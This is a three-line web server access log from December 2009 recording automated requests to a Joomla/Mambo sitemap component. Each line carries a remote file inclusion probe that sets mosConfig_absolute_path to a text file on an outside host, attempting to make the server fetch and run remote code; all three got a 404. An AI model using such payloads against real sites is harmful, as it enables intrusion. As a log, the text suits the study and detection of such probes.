65.18.192.91 - - [14/Dec/2009:13:11:30 -0800] "GET /logs/access_081110.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:11:31 -0800] "GET /logs/access_081210.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:13:11:31 -0800] "GET /logs/access_080525.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
